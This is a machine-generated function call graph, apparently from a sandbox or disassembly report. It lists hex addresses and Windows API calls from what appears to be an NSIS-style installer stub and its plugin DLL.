5514->5513 4420 4023e4 4421 402c41 17 API calls 4420->4421 4422 4023f6 4421->4422 4423 402c41 17 API calls 4422->4423 4424 402400 4423->4424 4437 402cd1 4424->4437 4427 40288b 4428 402438 4430 402444 4428->4430 4441 402c1f 4428->4441 4429 402c41 17 API calls 4433 40242e lstrlenW 4429->4433 4432 402463 RegSetValueExW 4430->4432 4444 4031d6 4430->4444 4435 402479 RegCloseKey 4432->4435 4433->4428 4435->4427 4438 402cec 4437->4438 4459 406283 4438->4459 4442 40640a 17 API calls 4441->4442 4443 402c34 4442->4443 4443->4430 4445 403201 4444->4445 4446 4031e5 SetFilePointer 4444->4446 4463 4032de GetTickCount 4445->4463 4446->4445 4449 40329e 4449->4432 4450 405f61 ReadFile 4451 403221 4450->4451 4451->4449 4452 4032de 42 API calls 4451->4452 4453 403238 4452->4453 4453->4449 4454 4032a4 ReadFile 4453->4454 4456 403247 4453->4456 4454->4449 4456->4449 4457 405f61 ReadFile 4456->4457 4458 405f90 WriteFile 4456->4458 4457->4456 4458->4456 4460 406292 4459->4460 4461 402410 4460->4461 4462 40629d RegCreateKeyExW 4460->4462 4461->4427 4461->4428 4461->4429 4462->4461 4464 403436 4463->4464 4465 40330c 4463->4465 4466 402e8e 32 API calls 4464->4466 4476 40345d SetFilePointer 4465->4476 4468 403208 4466->4468 4468->4449 4468->4450 4469 403317 SetFilePointer 4473 40333c 4469->4473 4473->4468 4474 405f90 WriteFile 4473->4474 4475 403417 SetFilePointer 4473->4475 4477 403447 4473->4477 4480 406943 4473->4480 4487 402e8e 4473->4487 4474->4473 4475->4464 4476->4469 4478 405f61 ReadFile 4477->4478 4479 40345a 4478->4479 4479->4473 4481 406968 4480->4481 4482 406970 4480->4482 4481->4473 4482->4481 4483 406a00 GlobalAlloc 4482->4483 4484 4069f7 GlobalFree 4482->4484 4485 406a77 GlobalAlloc 4482->4485 4486 406a6e GlobalFree 4482->4486 4483->4481 4483->4482 4484->4483 4485->4481 4485->4482 4486->4485 4488 402eb7 4487->4488 4489 402e9f 4487->4489 4492 402ec7 GetTickCount 4488->4492 4493 402ebf 4488->4493 4490 402ea8 DestroyWindow 4489->4490 4491 402eaf 4489->4491 4490->4491 4491->4473 4492->4491 4495 402ed5 4492->4495 4502 4067fe 4493->4502 4496 402f0a CreateDialogParamW ShowWindow 4495->4496 4497 402edd 4495->4497 4496->4491 4497->4491 4506 402e72 4497->4506 4499 402eeb wsprintfW 4500 405450 24 API calls 4499->4500 4501 402f08 4500->4501 4501->4491 4503 40681b PeekMessageW 4502->4503 4504 406811 DispatchMessageW 4503->4504 4505 40682b 4503->4505 4504->4503 4505->4491 4507 402e81 4506->4507 4508 402e83 MulDiv 4506->4508 4507->4508 4508->4499 5522 402868 5523 402c41 17 API calls 5522->5523 5524 40286f FindFirstFileW 5523->5524 5525 402897 5524->5525 5529 402882 5524->5529 5530 40632f wsprintfW 5525->5530 5527 4028a0 5531 4063e8 lstrcpynW 5527->5531 5530->5527 5531->5529 5532 401968 5533 402c1f 17 API calls 5532->5533 5534 40196f 5533->5534 5535 402c1f 17 API calls 5534->5535 5536 40197c 5535->5536 5537 402c41 17 API calls 5536->5537 5538 401993 lstrlenW 5537->5538 5539 4019a4 5538->5539 5540 4019e5 5539->5540 5544 4063e8 lstrcpynW 5539->5544 5542 4019d5 5542->5540 5543 4019da lstrlenW 5542->5543 5543->5540 5544->5542 5545 40166a 5546 402c41 17 API calls 5545->5546 5547 401670 5546->5547 5548 40672b 2 API calls 5547->5548 5549 401676 5548->5549 4942 40176f 4943 402c41 17 API calls 4942->4943 4944 401776 4943->4944 4945 401796 4944->4945 4946 40179e 4944->4946 4982 4063e8 lstrcpynW 4945->4982 4983 4063e8 lstrcpynW 4946->4983 4949 40179c 4953 40667c 5 API calls 4949->4953 4950 4017a9 4951 405cbd 3 API calls 4950->4951 4952 4017af lstrcatW 4951->4952 4952->4949 4964 4017bb 4953->4964 4954 40672b 2 API calls 4954->4964 4955 4017f7 4956 405eb9 2 API calls 4955->4956 4956->4964 4958 4017cd CompareFileTime 4958->4964 4959 40188d 4960 405450 24 API calls 4959->4960 4963 401897 4960->4963 4961 405450 24 API calls 4971 401879 4961->4971 4962 4063e8 lstrcpynW 4962->4964 4965 4031d6 44 API calls 4963->4965 4964->4954 4964->4955 4964->4958 4964->4959 4964->4962 4968 40640a 17 API calls 4964->4968 4978 405a4e MessageBoxIndirectW 4964->4978 4979 401864 4964->4979 4981 405ede GetFileAttributesW CreateFileW 4964->4981 4966 4018aa 4965->4966 4967 4018be SetFileTime 4966->4967 4969 4018d0 CloseHandle 4966->4969 4967->4969 4968->4964 4970 4018e1 4969->4970 4969->4971 4972 4018e6 4970->4972 4973 4018f9 4970->4973 4974 40640a 17 API calls 4972->4974 4975 40640a 17 API calls 4973->4975 4976 4018ee lstrcatW 4974->4976 4977 401901 4975->4977 4976->4977 4980 405a4e MessageBoxIndirectW 4977->4980 4978->4964 4979->4961 4979->4971 4980->4971 4981->4964 4982->4949 4983->4950 4984 4027ef 4985 4027f6 4984->4985 4988 402a70 4984->4988 4986 402c1f 17 API calls 4985->4986 4987 4027fd 4986->4987 4989 40280c SetFilePointer 4987->4989 4989->4988 4990 40281c 4989->4990 4992 40632f wsprintfW 4990->4992 4992->4988 5550 73b01000 5551 73b0101b 5 API calls 5550->5551 5552 73b01019 5551->5552 5553 401a72 5554 402c1f 17 API calls 5553->5554 5555 401a7b 5554->5555 5556 402c1f 17 API calls 5555->5556 5557 401a20 5556->5557 5558 406af2 5560 406976 5558->5560 5559 4072e1 5560->5559 5561 406a00 GlobalAlloc 5560->5561 5562 4069f7 GlobalFree 5560->5562 5563 406a77 GlobalAlloc 5560->5563 5564 406a6e GlobalFree 5560->5564 5561->5559 5561->5560 5562->5561 5563->5559 5563->5560 5564->5563 5565 401573 5566 401583 ShowWindow 5565->5566 5567 40158c 5565->5567 5566->5567 5568 40159a ShowWindow 5567->5568 5569 402ac5 5567->5569 5568->5569 5570 401cf3 5571 402c1f 17 API calls 5570->5571 5572 401cf9 IsWindow 5571->5572 5573 401a20 5572->5573 5574 402df3 5575 402e05 SetTimer 5574->5575 5576 402e1e 5574->5576 5575->5576 5577 402e6c 5576->5577 5578 402e72 MulDiv 5576->5578 5579 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5578->5579 5579->5577 5581 4014f5 SetForegroundWindow 5582 402ac5 5581->5582 5583 402576 5584 402c41 17 API calls 5583->5584 5585 40257d 5584->5585 5588 405ede GetFileAttributesW CreateFileW 5585->5588 5587 402589 5588->5587 5589 401b77 5590 401bc8 5589->5590 5592 401b84 5589->5592 5593 401bf2 GlobalAlloc 5590->5593 5594 401bcd 5590->5594 5591 401c0d 5595 40640a 17 API calls 5591->5595 5603 4022f7 5591->5603 5592->5591 5598 401b9b 5592->5598 5596 40640a 17 API calls 5593->5596 5594->5603 5610 4063e8 lstrcpynW 5594->5610 5597 4022f1 5595->5597 5596->5591 5602 405a4e MessageBoxIndirectW 5597->5602 5608 4063e8 lstrcpynW 5598->5608 5601 401bdf GlobalFree 5601->5603 5602->5603 5604 401baa 5609 4063e8 lstrcpynW 5604->5609 5606 401bb9 5611 4063e8 lstrcpynW 5606->5611 5608->5604 5609->5606 5610->5601 5611->5603 5612 4024f8 5613 402c81 17 API calls 5612->5613 5614 402502 5613->5614 5615 402c1f 17 API calls 5614->5615 5616 40250b 5615->5616 5617 402533 RegEnumValueW 5616->5617 5618 402527 RegEnumKeyW 5616->5618 5620 40288b 5616->5620 5619 402548 RegCloseKey 5617->5619 5618->5619 5619->5620 5242 40167b 5243 402c41 17 API calls 5242->5243 5244 401682 5243->5244 5245 402c41 17 API calls 5244->5245 5246 40168b 5245->5246 5247 402c41 17 API calls 5246->5247 5248 401694 MoveFileW 5247->5248 5249 4016a7 5248->5249 5255 4016a0 5248->5255 5250 402250 5249->5250 5251 40672b 2 API calls 5249->5251 5253 4016b6 5251->5253 5252 401423 24 API calls 5252->5250 5253->5250 5254 4061ae 36 API calls 5253->5254 5254->5255 5255->5252 5629 401e7d 5630 402c41 17 API calls 5629->5630 5631 401e83 5630->5631 5632 402c41 17 API calls 5631->5632 5633 401e8c 5632->5633 5634 402c41 17 API calls 5633->5634 5635 401e95 5634->5635 5636 402c41 17 API calls 5635->5636 5637 401e9e 5636->5637 5638 401423 24 API calls 5637->5638 5639 401ea5 5638->5639 5646 405a14 ShellExecuteExW 5639->5646 5641 401ee7 5644 40288b 5641->5644 5647 406873 WaitForSingleObject 5641->5647 5643 401f01 CloseHandle 5643->5644 5646->5641 5648 40688d 5647->5648 5649 40689f GetExitCodeProcess 5648->5649 5650 4067fe 2 API calls 5648->5650 5649->5643 5651 406894 WaitForSingleObject 5650->5651 5651->5648 5652 4019ff 5653 402c41 17 API calls 5652->5653 5654 401a06 5653->5654 5655 402c41 17 API calls 5654->5655 5656 401a0f 5655->5656 5657 401a16 lstrcmpiW 5656->5657 5658 401a28 lstrcmpW 5656->5658 5659 401a1c 5657->5659 5658->5659 5660 401000 5661 401037 BeginPaint GetClientRect 5660->5661 5662 40100c DefWindowProcW 5660->5662 5664 4010f3 5661->5664 5665 401179 5662->5665 5666 401073 CreateBrushIndirect FillRect DeleteObject 5664->5666 5667 4010fc 5664->5667 5666->5664 5668 401102 CreateFontIndirectW 5667->5668 5669 401167 EndPaint 5667->5669 5668->5669 5670 401112 6 API calls 5668->5670 5669->5665 5670->5669 5671 401503 5672 40150b 5671->5672 5674 40151e 5671->5674 5673 402c1f 17 API calls 5672->5673 5673->5674 4404 402104 4405 402c41 17 API calls 4404->4405 4406 40210b 4405->4406 4407 402c41 17 API calls 4406->4407 4408 402115 4407->4408 4409 402c41 17 API calls 4408->4409 4410 40211f 4409->4410 4411 402c41 17 API calls 4410->4411 4412 402129 4411->4412 4413 402c41 17 API calls 4412->4413 4415 402133 4413->4415 4414 402172 CoCreateInstance 4419 402191 4414->4419 4415->4414 4416 402c41 17 API calls 4415->4416 4416->4414 4417 401423 24 API calls 4418 402250 4417->4418 4419->4417 4419->4418 5675 402484 5676 402c81 17 API calls 5675->5676 5677 40248e 5676->5677 5678 402c41 17 API calls 5677->5678 5679 402497 5678->5679 5680 4024a2 RegQueryValueExW 5679->5680 5684 40288b 5679->5684 5681 4024c8 RegCloseKey 5680->5681 5682 4024c2 5680->5682 5681->5684 5682->5681 5686 40632f wsprintfW 5682->5686 5686->5681 4762 403e86 4763 403fd9 4762->4763 4764 403e9e 4762->4764 4766 403fea GetDlgItem GetDlgItem 4763->4766 4774 40402a 4763->4774 4764->4763 4765 403eaa 4764->4765 4767 403eb5 SetWindowPos 4765->4767 4768 403ec8 4765->4768 4769 40435f 18 API calls 4766->4769 4767->4768 4771 403ee5 4768->4771 4772 403ecd ShowWindow 4768->4772 4773 404014 SetClassLongW 4769->4773 4770 4043ab SendMessageW 4803 404096 4770->4803 4777 403f07 4771->4777 4778 403eed DestroyWindow 4771->4778 4772->4771 4779 40140b 2 API calls 4773->4779 4775 404084 4774->4775 4780 401389 2 API calls 4774->4780 4775->4770 4776 403fd4 4775->4776 4782 403f0c SetWindowLongW 4777->4782 4783 403f1d 4777->4783 4781 4042e8 4778->4781 4779->4774 4784 40405c 4780->4784 4781->4776 4791 404319 ShowWindow 4781->4791 4782->4776 4787 403fc6 4783->4787 4788 403f29 GetDlgItem 4783->4788 4784->4775 4789 404060 SendMessageW 4784->4789 4785 40140b 2 API calls 4785->4803 4786 4042ea DestroyWindow EndDialog 4786->4781 4842 4043c6 4787->4842 4792 403f59 4788->4792 4793 403f3c SendMessageW IsWindowEnabled 4788->4793 4789->4776 4791->4776 4795 403f66 4792->4795 4796 403fad SendMessageW 4792->4796 4797 403f79 4792->4797 4806 403f5e 4792->4806 4793->4776 4793->4792 4794 40640a 17 API calls 4794->4803 4795->4796 4795->4806 4796->4787 4800 403f81 4797->4800 4801 403f96 4797->4801 4799 40435f 18 API calls 4799->4803 4804 40140b 2 API calls 4800->4804 4805 40140b 2 API calls 4801->4805 4802 403f94 4802->4787 4803->4776 4803->4785 4803->4786 4803->4794 4803->4799 4824 40422a DestroyWindow 4803->4824 4833 40435f 4803->4833 4804->4806 4807 403f9d 4805->4807 4839 404338 4806->4839 4807->4787 4807->4806 4809 404111 GetDlgItem 4810 404126 4809->4810 4811 40412e ShowWindow KiUserCallbackDispatcher 4809->4811 4810->4811 4836 404381 KiUserCallbackDispatcher 4811->4836 4813 404158 EnableWindow 4818 40416c 4813->4818 4814 404171 GetSystemMenu EnableMenuItem SendMessageW 4815 4041a1 SendMessageW 4814->4815 4814->4818 4815->4818 4817 403e67 18 API calls 4817->4818 4818->4814 4818->4817 4837 404394 SendMessageW 4818->4837 4838 4063e8 lstrcpynW 4818->4838 4820 4041d0 lstrlenW 4821 40640a 17 API calls 4820->4821 4822 4041e6 SetWindowTextW 4821->4822 4823 401389 2 API calls 4822->4823 4823->4803 4824->4781 4825 404244 CreateDialogParamW 4824->4825 4825->4781 4826 404277 4825->4826 4827 40435f 18 API calls 4826->4827 4828 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4827->4828 4829 401389 2 API calls 4828->4829 4830 4042c8 4829->4830 4830->4776 4831 4042d0 ShowWindow 4830->4831 4832 4043ab SendMessageW 4831->4832 4832->4781 4834 40640a 17 API calls 4833->4834 4835 40436a SetDlgItemTextW 4834->4835 4835->4809 4836->4813 4837->4818 4838->4820 4840 404345 SendMessageW 4839->4840 4841 40433f 4839->4841 4840->4802 4841->4840 4843 404489 4842->4843 4844 4043de GetWindowLongW 4842->4844 4843->4776 4844->4843 4845 4043f3 4844->4845 4845->4843 4846 404420 GetSysColor 4845->4846 4847 404423 4845->4847 4846->4847 4848 404433 SetBkMode 4847->4848 4849 404429 SetTextColor 4847->4849 4850 404451 4848->4850 4851 40444b GetSysColor 4848->4851 4849->4848 4852 404462 4850->4852 4853 404458 SetBkColor 4850->4853 4851->4850 4852->4843 4854 404475 DeleteObject 4852->4854 4855 40447c CreateBrushIndirect 4852->4855 4853->4852 4854->4855 4855->4843 5687 401f06 5688 402c41 17 API calls 5687->5688 5689 401f0c 5688->5689 5690 405450 24 API calls 5689->5690 5691 401f16 5690->5691 5692 4059d1 2 API calls 5691->5692 5693 401f1c 5692->5693 5694 401f3f CloseHandle 5693->5694 5696 406873 5 API calls 5693->5696 5697 40288b 5693->5697 5694->5697 5698 401f31 5696->5698 5698->5694 5700 40632f wsprintfW 5698->5700 5700->5694 5701 404809 5702 404819 5701->5702 5703 40483f 5701->5703 5704 40435f 18 API calls 5702->5704 5705 4043c6 8 API calls 5703->5705 5706 404826 SetDlgItemTextW 5704->5706 5707 40484b 5705->5707 5706->5703 4891 40230c 4892 402314 4891->4892 4893 40231a 4891->4893 4894 402c41 17 API calls 4892->4894 4895 402328 4893->4895 4896 402c41 17 API calls 4893->4896 4894->4893 4897 402336 4895->4897 4898 402c41 17 API calls 4895->4898 4896->4895 4899 402c41 17 API calls 4897->4899 4898->4897 4900 40233f WritePrivateProfileStringW 4899->4900 5708 40190c 5709 401943 5708->5709 5710 402c41 17 API calls 5709->5710 5711 401948 5710->5711 5712 405afa 67 API calls 5711->5712 5713 401951 5712->5713 5714 401f8c 5715 402c41 17 API calls 5714->5715 5716 401f93 5715->5716 5717 4067c2 5 API calls 5716->5717 5718 401fa2 5717->5718 5719 401fbe GlobalAlloc 5718->5719 5720 402026 5718->5720 5719->5720 5721 401fd2 5719->5721 5722 4067c2 5 API calls 5721->5722 5723 401fd9 5722->5723 5724 4067c2 5 API calls 5723->5724 5725 401fe3 5724->5725 5725->5720 5729 40632f wsprintfW 5725->5729 5727 402018 5730 40632f wsprintfW 5727->5730 5729->5727 5730->5720 5731 73b022fd 5732 73b02367 5731->5732 5733 73b02372 GlobalAlloc 5732->5733 5734 73b02391 5732->5734 5733->5732 4908 40238e 4909 4023c1 4908->4909 4910 402396 4908->4910 4911 402c41 17 API calls 4909->4911 4924 402c81 4910->4924 4913 4023c8 4911->4913 4920 402cff 4913->4920 4915 4023a7 4917 402c41 17 API calls 4915->4917 4918 4023ae RegDeleteValueW RegCloseKey 4917->4918 4919 4023d5 4918->4919 4921 402d0c 4920->4921 4922 402d13 4920->4922 4921->4919 4922->4921 4929 402d44 4922->4929 4925 402c41 17 API calls 4924->4925 4926 402c98 4925->4926 4927 406255 RegOpenKeyExW 4926->4927 4928 40239d 4927->4928 4928->4915 4928->4919 4930 406255 RegOpenKeyExW 4929->4930 4931 402d72 4930->4931 4932 402dec 4931->4932 4934 402d76 4931->4934 4932->4921 4933 402d98 RegEnumKeyW 4933->4934 4935 402daf RegCloseKey 4933->4935 4934->4933 4934->4935 4936 402dd0 RegCloseKey 4934->4936 4938 402d44 6 API calls 4934->4938 4937 4067c2 5 API calls 4935->4937 4936->4932 4939 402dbf 4937->4939 4938->4934 4940 402de0 RegDeleteKeyW 4939->4940 4941 402dc3 4939->4941 4940->4932 4941->4932 4993 40558f 4994 4055b0 GetDlgItem GetDlgItem GetDlgItem 4993->4994 4995 405739 4993->4995 5039 404394 SendMessageW 4994->5039 4997 405742 GetDlgItem CreateThread CloseHandle 4995->4997 4998 40576a 4995->4998 4997->4998 5042 405523 5 API calls 4997->5042 4999 405795 4998->4999 5000 405781 ShowWindow ShowWindow 4998->5000 5001 4057ba 4998->5001 5002 4057a1 4999->5002 5004 4057f5 4999->5004 5041 404394 SendMessageW 5000->5041 5008 4043c6 8 API calls 5001->5008 5006 4057a9 5002->5006 5007 4057cf ShowWindow 5002->5007 5003 405620 5009 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5003->5009 5004->5001 5012 405803 SendMessageW 5004->5012 5013 404338 SendMessageW 5006->5013 5015 4057e1 5007->5015 5016 4057ef 5007->5016 5014 4057c8 5008->5014 5010 405695 5009->5010 5011 405679 SendMessageW SendMessageW 5009->5011 5017 4056a8 5010->5017 5018 40569a SendMessageW 5010->5018 5011->5010 5012->5014 5019 40581c CreatePopupMenu 5012->5019 5013->5001 5020 405450 24 API calls 5015->5020 5021 404338 SendMessageW 5016->5021 5023 40435f 18 API calls 5017->5023 5018->5017 5022 40640a 17 API calls 5019->5022 5020->5016 5021->5004 5024 40582c AppendMenuW 5022->5024 5025 4056b8 5023->5025 5026 405849 GetWindowRect 5024->5026 5027 40585c TrackPopupMenu 5024->5027 5028 4056c1 ShowWindow 5025->5028 5029 4056f5 GetDlgItem SendMessageW 5025->5029 5026->5027 5027->5014 5030 405877 5027->5030 5031 4056d7 ShowWindow 5028->5031 5034 4056e4 5028->5034 5029->5014 5032 40571c SendMessageW SendMessageW 5029->5032 5033 405893 SendMessageW 5030->5033 5031->5034 5032->5014 5033->5033 5035 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5033->5035 5040 404394 SendMessageW 5034->5040 5037 4058d5 SendMessageW 5035->5037 5037->5037 5038 4058fe GlobalUnlock SetClipboardData CloseClipboard 5037->5038 5038->5014 5039->5003 5040->5029 5041->4999 5735 40190f 5736 402c41 17 API calls 5735->5736 5737 401916 5736->5737 5738 405a4e MessageBoxIndirectW 5737->5738 5739 40191f 5738->5739 5740 73b010e1 5749 73b01111 5740->5749 5741 73b011d8 GlobalFree 5742 73b012ba 2 API calls 5742->5749 5743 73b011d3 5743->5741 5744 73b01272 2 API calls 5747 73b011c4 GlobalFree 5744->5747 5745 73b01164 GlobalAlloc 5745->5749 5746 73b011f8 GlobalFree 5746->5749 5747->5749 5748 73b012e1 lstrcpyW 5748->5749 5749->5741 5749->5742 5749->5743 5749->5744 5749->5745 5749->5746 5749->5747 5749->5748 5750 401491 5751 405450 24 API calls 5750->5751 5752 401498 5751->5752 5234 405a14 ShellExecuteExW 5760 401d14 5761 402c1f 17 API calls 5760->5761 5762 401d1b 5761->5762 5763 402c1f 17 API calls 5762->5763 5764 401d27 GetDlgItem 5763->5764 5765 402592 5764->5765 5766 404495 lstrcpynW lstrlenW 5767 403a96 5768 403aa1 5767->5768 5769 403aa5 5768->5769 5770 403aa8 GlobalAlloc 5768->5770 5770->5769 5771 402598 5772 4025c7 5771->5772 5773 4025ac 5771->5773 5775 4025fb 5772->5775 5776 4025cc 5772->5776 5774 402c1f 17 API calls 5773->5774 5781 4025b3 5774->5781 5778 402c41 17 API calls 5775->5778 5777 402c41 17 API calls 5776->5777 5780 4025d3 WideCharToMultiByte lstrlenA 5777->5780 5779 402602 lstrlenW 5778->5779 5779->5781 5780->5781 5782 40262f 5781->5782 5783 402645 5781->5783 5785 405fbf 5 API calls 5781->5785 5782->5783 5784 405f90 WriteFile 5782->5784 5784->5783 5785->5782 5786 73b0166d 5787 73b01516 GlobalFree 5786->5787 5789 73b01685 5787->5789 5788 73b016cb GlobalFree 5789->5788 5790 73b016a0 5789->5790 5791 73b016b7 VirtualFree 5789->5791 5790->5788 5791->5788 5792 40451e 5793 404536 5792->5793 5795 404650 5792->5795 5798 40435f 18 API calls 5793->5798 5794 4046ba 5796 404784 5794->5796 5797 4046c4 GetDlgItem 5794->5797 5795->5794 5795->5796 5801 40468b GetDlgItem SendMessageW 5795->5801 5803 4043c6 8 API calls 5796->5803 5799 404745 5797->5799 5800 4046de 5797->5800 5802 40459d 5798->5802 5799->5796 5804 404757 5799->5804 5800->5799 5807 404704 SendMessageW LoadCursorW SetCursor 5800->5807 5825 404381 KiUserCallbackDispatcher 5801->5825 5806 40435f 18 API calls 5802->5806 5814 40477f 5803->5814 5808 40476d 5804->5808 5809 40475d SendMessageW 5804->5809 5811 4045aa CheckDlgButton 5806->5811 5826 4047cd 5807->5826 5813 404773 SendMessageW 5808->5813 5808->5814 5809->5808 5810 4046b5 5815 4047a9 SendMessageW 5810->5815 5823 404381 KiUserCallbackDispatcher 5811->5823 5813->5814 5815->5794 5818 4045c8 GetDlgItem 5824 404394 SendMessageW 5818->5824 5820 4045de SendMessageW 5821 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5820->5821 5822 4045fb GetSysColor 5820->5822 5821->5814 5822->5821 5823->5818 5824->5820 5825->5810 5829 405a14 ShellExecuteExW 5826->5829 5828 404733 LoadCursorW SetCursor 5828->5799 5829->5828 5830 40149e 5831 4022f7 5830->5831 5832 4014ac PostQuitMessage 5830->5832 5832->5831 5833 401c1f 5834 402c1f 17 API calls 5833->5834 5835 401c26 5834->5835 5836 402c1f 17 API calls 5835->5836 5837 401c33 5836->5837 5838 401c48 5837->5838 5839 402c41 17 API calls 5837->5839 5840 401c58 5838->5840 5843 402c41 17 API calls 5838->5843 5839->5838 5841 401c63 5840->5841 5842 401caf 5840->5842 5844 402c1f 17 API calls 5841->5844 5845 402c41 17 API calls 5842->5845 5843->5840 5846 401c68 5844->5846 5847 401cb4 5845->5847 5848 402c1f 17 API calls 5846->5848 5849 402c41 17 API calls 5847->5849 5850 401c74 5848->5850 5851 401cbd FindWindowExW 5849->5851 5852 401c81 SendMessageTimeoutW 5850->5852 5853 401c9f SendMessageW 5850->5853 5854 401cdf 5851->5854 5852->5854 5853->5854 5855 402aa0 SendMessageW 5856 402ac5 5855->5856 5857 402aba InvalidateRect 5855->5857 5857->5856 5858 402821 5859 402827 5858->5859 5860 402ac5 5859->5860 5861 40282f FindClose 5859->5861 5861->5860 4400 4015a3 4401 402c41 17 API calls 4400->4401 4402 4015aa SetFileAttributesW 4401->4402 4403 4015bc 4402->4403 5862 73b016d4 5863 73b01703 5862->5863 5864 73b01b5f 22 API calls 5863->5864 5865 73b0170a 5864->5865 5866 73b01711 5865->5866 5867 73b0171d 5865->5867 5868 73b01272 2 API calls 5866->5868 5869 73b01744 5867->5869 5870 73b01727 5867->5870 5873 73b0171b 5868->5873 5871 73b0174a 5869->5871 5872 73b0176e 5869->5872 5874 73b0153d 3 API calls 5870->5874 5875 73b015b4 3 API calls 5871->5875 5876 73b0153d 3 API calls 5872->5876 5877 73b0172c 5874->5877 5878 73b0174f 5875->5878 5876->5873 5879 73b015b4 3 API calls 5877->5879 5880 73b01272 2 API calls 5878->5880 5881 73b01732 5879->5881 5883 73b01755 GlobalFree 5880->5883 5882 73b01272 2 API calls 5881->5882 5884 73b01738 GlobalFree 5882->5884 5883->5873 5885 73b01769 GlobalFree 5883->5885 5884->5873 5885->5873 4509 4034a5 SetErrorMode GetVersion 4510 4034e4 4509->4510 4512 4034ea 4509->4512 4511 4067c2 5 API calls 4510->4511 4511->4512 4513 406752 3 API calls 4512->4513 4514 403500 lstrlenA 4513->4514 4514->4512 4515 403510 4514->4515 4516 4067c2 5 API calls 4515->4516 4517 403517 4516->4517 4518 4067c2 5 API calls 4517->4518 4519 40351e 4518->4519 4520 4067c2 5 API calls 4519->4520 4521 40352a #17 OleInitialize SHGetFileInfoW 4520->4521 4599 4063e8 lstrcpynW 4521->4599 4524 403576 GetCommandLineW 4600 4063e8 lstrcpynW 4524->4600 4526 403588 4527 405cea CharNextW 4526->4527 4528 4035ad CharNextW 4527->4528 4529 4036d7 GetTempPathW 4528->4529 4537 4035c6 4528->4537 4601 403474 4529->4601 4531 4036ef 4532 4036f3 GetWindowsDirectoryW lstrcatW 4531->4532 4533 403749 DeleteFileW 4531->4533 4534 403474 12 API calls 4532->4534 4611 402f30 GetTickCount GetModuleFileNameW 4533->4611 4538 40370f 4534->4538 4535 405cea CharNextW 4535->4537 4537->4535 4544 4036c2 4537->4544 4545 4036c0 4537->4545 4538->4533 4540 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4538->4540 4539 40375d 4541 403810 4539->4541 4546 403800 4539->4546 4550 405cea CharNextW 4539->4550 4543 403474 12 API calls 4540->4543 4700 4039e6 4541->4700 4548 403741 4543->4548 4697 4063e8 lstrcpynW 4544->4697 4545->4529 4641 403ad8 4546->4641 4548->4533 4548->4541 4563 40377c 4550->4563 4552 40394a 4555 403952 GetCurrentProcess OpenProcessToken 4552->4555 4556 4039ce ExitProcess 4552->4556 4553 40382a 4709 405a4e 4553->4709 4561 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4555->4561 4562 40399e 4555->4562 4559 403840 4565 4059b9 5 API calls 4559->4565 4560 4037da 4564 405dc5 18 API calls 4560->4564 4561->4562 4566 4067c2 5 API calls 4562->4566 4563->4559 4563->4560 4567 4037e6 4564->4567 4568 403845 lstrcatW 4565->4568 4569 4039a5 4566->4569 4567->4541 4698 4063e8 lstrcpynW 4567->4698 4570 403861 lstrcatW lstrcmpiW 4568->4570 4571 403856 lstrcatW 4568->4571 4572 4039ba ExitWindowsEx 4569->4572 4573 4039c7 4569->4573 4570->4541 4575 40387d 4570->4575 4571->4570 4572->4556 4572->4573 4718 40140b 4573->4718 4578 403882 4575->4578 4579 403889 4575->4579 4577 4037f5 4699 4063e8 lstrcpynW 4577->4699 4581 40591f 4 API calls 4578->4581 4582 40599c 2 API calls 4579->4582 4584 403887 4581->4584 4583 40388e SetCurrentDirectoryW 4582->4583 4585 4038a9 4583->4585 4586 40389e 4583->4586 4584->4583 4714 4063e8 lstrcpynW 4585->4714 4713 4063e8 lstrcpynW 4586->4713 4589 4038b7 4590 40640a 17 API calls 4589->4590 4593 40393e 4589->4593 4595 4061ae 36 API calls 4589->4595 4596 40640a 17 API calls 4589->4596 4598 403929 CloseHandle 4589->4598 4715 4059d1 CreateProcessW 4589->4715 4591 4038e8 DeleteFileW 4590->4591 4591->4589 4592 4038f5 CopyFileW 4591->4592 4592->4589 4594 4061ae 36 API calls 4593->4594 4594->4541 4595->4589 4596->4589 4598->4589 4599->4524 4600->4526 4602 40667c 5 API calls 4601->4602 4604 403480 4602->4604 4603 40348a 4603->4531 4604->4603 4605 405cbd 3 API calls 4604->4605 4606 403492 4605->4606 4607 40599c 2 API calls 4606->4607 4608 403498 4607->4608 4721 405f0d 4608->4721 4725 405ede GetFileAttributesW CreateFileW 4611->4725 4613 402f73 4630 402f80 4613->4630 4726 4063e8 lstrcpynW 4613->4726 4615 402f96 4616 405d09 2 API calls 4615->4616 4617 402f9c 4616->4617 4727 4063e8 lstrcpynW 4617->4727 4619 402fa7 GetFileSize 4620 4030a8 4619->4620 4624 402fbe 4619->4624 4621 402e8e 32 API calls 4620->4621 4623 4030af 4621->4623 4622 403447 ReadFile 4622->4624 4626 4030eb GlobalAlloc 4623->4626 4623->4630 4729 40345d SetFilePointer 4623->4729 4624->4620 4624->4622 4625 403143 4624->4625 4624->4630 4633 402e8e 32 API calls 4624->4633 4628 402e8e 32 API calls 4625->4628 4627 403102 4626->4627 4634 405f0d 2 API calls 4627->4634 4628->4630 4630->4539 4631 4030cc 4632 403447 ReadFile 4631->4632 4635 4030d7 4632->4635 4633->4624 4636 403113 CreateFileW 4634->4636 4635->4626 4635->4630 4636->4630 4637 40314d 4636->4637 4728 40345d SetFilePointer 4637->4728 4639 40315b 4640 4031d6 44 API calls 4639->4640 4640->4630 4642 4067c2 5 API calls 4641->4642 4643 403aec 4642->4643 4644 403af2 4643->4644 4645 403b04 4643->4645 4745 40632f wsprintfW 4644->4745 4646 4062b6 3 API calls 4645->4646 4647 403b34 4646->4647 4649 403b53 lstrcatW 4647->4649 4651 4062b6 3 API calls 4647->4651 4650 403b02 4649->4650 4730 403dae 4650->4730 4651->4649 4654 405dc5 18 API calls 4655 403b85 4654->4655 4656 403c19 4655->4656 4658 4062b6 3 API calls 4655->4658 4657 405dc5 18 API calls 4656->4657 4659 403c1f 4657->4659 4660 403bb7 4658->4660 4661 403c2f LoadImageW 4659->4661 4662 40640a 17 API calls 4659->4662 4660->4656 4665 403bd8 lstrlenW 4660->4665 4669 405cea CharNextW 4660->4669 4663 403cd5 4661->4663 4664 403c56 RegisterClassW 4661->4664 4662->4661 4668 40140b 2 API calls 4663->4668 4666 403cdf 4664->4666 4667 403c8c 